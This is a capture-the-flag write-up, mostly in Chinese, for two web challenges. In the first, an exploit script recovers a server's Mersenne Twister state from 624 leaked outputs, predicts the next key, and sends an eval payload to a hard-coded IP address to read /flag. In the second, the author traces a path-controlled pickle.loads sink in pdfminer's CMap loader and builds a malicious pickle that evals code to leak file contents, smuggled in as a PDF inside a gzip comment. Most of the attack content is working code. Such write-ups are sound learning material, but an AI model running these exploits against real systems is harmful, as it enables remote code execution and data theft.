连发 624 次请求收集 624 个 32-bit 输出,重建 MT19937 的内部状态,从而预测下一次 getrandbits(32) 的值。这样在第 625 次请求中,直接把 key 设置为下一次将要生成的 key2,即可通过校验
执行代码这里显然把 `__builtins__` 拼错成了 `__builtin__`(少了个 s)。eval 的 globals 中没有 `__builtins__` 键时,Python 会自动注入真正的内置模块,所以这里并不是沙箱
# Vulnerable server-side call quoted from the challenge. The globals dict uses
# the key '__builtin__' (missing the trailing 's'), not '__builtins__', so as
# the writeup notes this does not sandbox the payload.
eval(payload, {'__builtin__':{}})
最后使用 session 写入 flag,从响应的 set-cookie 读取 flag
exp:
import requests
import sys
import re
import json
import base64
import zlib
from typing import List
# MT19937 parameters used by the state-recovery code below.
N = 624                      # number of 32-bit words in the generator state
M = 397                      # offset of the word mixed in during the twist
MATRIX_A = 0x9908_B0DF       # XORed in when the combined word's low bit is set
UPPER_MASK = 1 << 31         # most significant bit of a 32-bit word
LOWER_MASK = UPPER_MASK - 1  # least significant 31 bits
def unshift_right_xor(y: int, shift: int) -> int:
    """Invert ``y = x ^ (x >> shift)`` for a 32-bit ``x``.

    Args:
        y: The 32-bit value produced by the right-shift/XOR step.
        shift: The (positive) shift amount that was used.

    Returns:
        The original 32-bit ``x``.
    """
    x = 0
    # Recover bits from the most significant down: the top ``shift`` bits of
    # ``y`` are unchanged, and every lower bit was XORed with an already
    # recovered higher bit of ``x``.
    for i in range(31, -1, -1):
        yi = (y >> i) & 1
        if i + shift <= 31:
            xi = yi ^ ((x >> (i + shift)) & 1)
        else:
            xi = yi
        x |= xi << i
    return x & 0xffffffff
def unshift_left_xor_mask(y: int, shift: int, mask: int) -> int:
    """Invert ``y = x ^ ((x << shift) & mask)`` for a 32-bit ``x``.

    Args:
        y: The 32-bit value produced by the left-shift/mask/XOR step.
        shift: The (positive) shift amount that was used.
        mask: The 32-bit mask that was ANDed with the shifted value.

    Returns:
        The original 32-bit ``x``.
    """
    x = 0
    # Recover bits from the least significant up: the low ``shift`` bits of
    # ``y`` are unchanged, and a higher bit was XORed with an already
    # recovered lower bit of ``x`` only where the mask bit is set.
    for i in range(32):
        yi = (y >> i) & 1
        if i - shift >= 0 and ((mask >> i) & 1):
            xi = yi ^ ((x >> (i - shift)) & 1)
        else:
            xi = yi
        x |= xi << i
    return x & 0xffffffff
def untemper(y: int) -> int:
    """Undo the tempering applied in ``MTPredictor.extract_number``.

    The four tempering steps are inverted in reverse order, turning one 32-bit
    generator output back into the raw state word it was derived from.

    Args:
        y: A tempered 32-bit output.

    Returns:
        The corresponding untempered 32-bit state word.
    """
    y = unshift_right_xor(y, 18)
    y = unshift_left_xor_mask(y, 15, 0xEFC60000)
    y = unshift_left_xor_mask(y, 7, 0x9D2C5680)
    y = unshift_right_xor(y, 11)
    return y & 0xffffffff
class MTPredictor:
    """Minimal MT19937 clone that can be loaded with a recovered state."""

    def __init__(self):
        self.mt = [0] * N
        # index == N means the state is exhausted: the next extraction twists.
        self.index = N

    def seed_with_untempered(self, vals: List[int]):
        """Load ``N`` untempered state words as the current state.

        The index is set to ``N``, so the next ``extract_number`` call first
        twists the state and then returns the first word of the new block.
        """
        assert len(vals) == N
        self.mt = [v & 0xffffffff for v in vals]
        self.index = N

    def twist(self):
        """Regenerate all ``N`` state words in place and reset the index."""
        for i in range(N):
            # Top bit of word i combined with the low 31 bits of word i + 1.
            y = (self.mt[i] & UPPER_MASK) | (self.mt[(i + 1) % N] & LOWER_MASK)
            self.mt[i] = self.mt[(i + M) % N] ^ (y >> 1)
            if y & 1:
                self.mt[i] ^= MATRIX_A
        self.index = 0

    def extract_number(self) -> int:
        """Return the next tempered 32-bit output, twisting first if needed."""
        if self.index >= N:
            self.twist()
        y = self.mt[self.index]
        # temper
        y ^= (y >> 11)
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= (y >> 18)
        self.index += 1
        return y & 0xffffffff
def parse_leak_message(msg: str) -> int:
    """Extract the leaked integer from a ``Not Allowed:<digits>`` message.

    Args:
        msg: The ``message`` field returned by the API.

    Returns:
        The leaked number as an int.

    Raises:
        ValueError: If ``msg`` does not contain ``Not Allowed:<digits>``.
    """
    # In a raw string ``\d`` is the digit class; the doubled backslash in the
    # earlier version matched a literal backslash and so never found a number.
    m = re.search(r'Not Allowed:(\d+)', msg)
    if not m:
        raise ValueError(f"Unexpected message: {msg!r}")
    return int(m.group(1))
def decode_flask_session(cookie_value: str) -> dict:
    """Decode the data part of a Flask session cookie without verifying it.

    The cookie has the form ``<data>.<timestamp>.<sig>``; when the data was
    zlib-compressed the whole cookie is prefixed with an extra ``.``.

    Args:
        cookie_value: The raw value of the ``session`` cookie.

    Returns:
        The JSON-decoded session payload.

    Raises:
        zlib.error: If the cookie is marked compressed but cannot be inflated.
        ValueError: If the payload is not valid base64 / JSON.
    """
    # A leading '.' marks a compressed payload; without stripping it the first
    # split field would be empty and nothing would be decoded.
    compressed = cookie_value.startswith('.')
    if compressed:
        cookie_value = cookie_value[1:]
    payload = cookie_value.split('.', 1)[0]
    # Flask strips base64 padding; restore it before decoding.
    payload += '=' * (-len(payload) % 4)
    raw = base64.urlsafe_b64decode(payload.encode())
    if compressed:
        raw = zlib.decompress(raw)
    else:
        # Best effort for unmarked payloads: keep the bytes as-is when they
        # are not a zlib stream.
        try:
            raw = zlib.decompress(raw)
        except zlib.error:
            pass
    return json.loads(raw.decode('utf-8'))
def exploit(base_url: str):
    """Recover the server's MT19937 state, predict the next key and read the flag.

    Sends ``N`` requests with a wrong key to collect leaked 32-bit outputs,
    rebuilds the generator state from them, then sends one more request whose
    key is the predicted next output together with a payload that stores the
    flag in the Flask session. The flag is read back from the session cookie.

    Args:
        base_url: Base URL of the target; ``/api`` is appended to it.

    Returns:
        The value stored under ``flag`` in the decoded session, or ``None`` if
        the key is absent. Exits the process with status 1 on an unexpected
        response.
    """
    s = requests.Session()
    api = base_url.rstrip('/') + '/api'

    leaks = []
    for i in range(N):
        r = s.post(api, json={'key': 'x'}, timeout=10)
        if r.status_code not in (400, 403):
            print(f'[!] Unexpected status at i={i}: {r.status_code}, body={r.text}')
            sys.exit(1)
        try:
            data = r.json()
        except ValueError:
            print(f'[!] Non-JSON response at i={i}: {r.text[:200]}')
            sys.exit(1)
        if not isinstance(data, dict) or 'message' not in data:
            print(f'[!] No message field at i={i}: {data}')
            sys.exit(1)
        leaks.append(parse_leak_message(data['message']))
        if (i + 1) % 50 == 0 or i == N - 1:
            print(f' collected {i+1}/{N}')

    # N consecutive outputs, untempered, are exactly one full state block.
    state = [untemper(v) for v in leaks]
    pred = MTPredictor()
    pred.seed_with_untempered(state)
    next_key = pred.extract_number()
    print(f'Next key2 = {next_key}')

    payload = "__import__('flask').session.update({'flag':__import__('builtins').open('/flag').read()})"
    r = s.post(api, json={'key': str(next_key), 'payload': payload}, timeout=10)

    cookie = r.cookies.get('session') or s.cookies.get('session')
    if not cookie:
        print(f'[!] No session cookie in response: {r.status_code}, body={r.text[:200]}')
        sys.exit(1)
    # Keep the HTTP session and the decoded cookie under separate names.
    session_data = decode_flask_session(cookie)
    flag = session_data.get('flag')
    print(flag)
    return flag
if __name__ == '__main__':
    # Plain URL: the surrounding '<' '>' were markdown autolink markers and
    # are not part of the address.
    exploit('http://43.138.4.37:30250/')
应用本身的代码比较正常,没有可疑点,结合题干来看应该是在用到的库里找利用点。在pdfminer/cmapdb.py中找到 pickle.loads:
class CMapDB:
    # Excerpt of pdfminer/cmapdb.py, quoted to show the deserialization sink.
    _cmap_cache: Dict[str, PyCMap] = {}
    _umap_cache: Dict[str, List[PyUnicodeMap]] = {}

    class CMapNotFound(CMapError):
        pass

    @classmethod
    def _load_data(cls, name: str) -> Any:
        """Load ``<name>.pickle.gz`` from the CMap search path and unpickle it.

        Raises:
            CMapDB.CMapNotFound: If no such file exists in any search directory.
        """
        # Only NUL characters are stripped; path separators in ``name`` are kept.
        name = name.replace("\0", "")
        filename = "%s.pickle.gz" % name
        log.debug("loading: %r", name)
        cmap_paths = (
            os.environ.get("CMAP_PATH", "/usr/share/pdfminer/"),
            os.path.join(os.path.dirname(__file__), "cmap"),
        )
        for directory in cmap_paths:
            # os.path.join discards ``directory`` when ``filename`` is absolute.
            path = os.path.join(directory, filename)
            if os.path.exists(path):
                gzfile = gzip.open(path)
                try:
                    # SECURITY: pickle.loads runs on file contents selected by a
                    # name taken from the PDF; this is the sink the writeup uses.
                    return type(str(name), (), pickle.loads(gzfile.read()))
                finally:
                    gzfile.close()
        raise CMapDB.CMapNotFound(name)
这里是当成 gz 加载的,文件名需要是 .pickle.gz 结尾。它在两个目录下查找并读取:环境变量 CMAP_PATH(默认 /usr/share/pdfminer/)与包内 pdfminer/cmap/
这个 name 可控,来自 PDF 中的 CMap 名,或 ToUnicode CMap 流里的 usecmap 操作数。若 name 为绝对路径,os.path.join(directory, filename) 会丢弃 directory、直接返回该绝对路径(末尾仍会拼上 .pickle.gz),就可以绕过内置目录限制
分析调用链:
->pdfutils.pdf_to_text
->pdfminer.high_level.extract_pages
->PDFPageInterpreter.process_page
->PDFPageInterpreter.render_contents
->PDFPageInterpreter.init_resources
->PDFResourceManager.get_font
->PDFCIDFont.__init__
->PDFCIDFont.get_cmap_from_spec
->CMapDB.get_cmap
->CMapDB._load_data
->pickle.loads
app.py会把报错回显:
**try:
pdf_to_text(pdf_path, txt_path)
except Exception as e:
return str(e), 500**
所以这样构造pickle序列化数据:
from pathlib import Path
import pickle
def build_payload_raw(out="payload.raw"):
    """Build the pickle payload and write it to ``out``.

    Unpickling the result calls ``eval`` on an expression that raises an
    ``Exception`` whose message is the content of ``/flag``.

    Args:
        out: Path of the file the raw pickle bytes are written to.

    Returns:
        The raw pickle bytes that were written.
    """
    # A generator's .throw() lets a single expression raise an exception.
    expr = "(_ for _ in ()).throw(Exception(open('/flag','r').read()))"

    class R:
        def __reduce__(self):
            # On load, pickle calls eval(expr).
            return (eval, (expr,))

    data = pickle.dumps(R(), protocol=pickle.HIGHEST_PROTOCOL)
    Path(out).write_bytes(data)
    return data


# Backward-compatible alias for the earlier, misspelled function name.
build_yload_raw = build_payload_raw


if __name__ == "__main__":
    build_payload_raw()
要使文件既能被 extract_pages 当作 PDF 通过校验,又能被 gzip.open 正常解压,可以把一个有效 PDF 放在 gzip 头部的 Comment 字段里。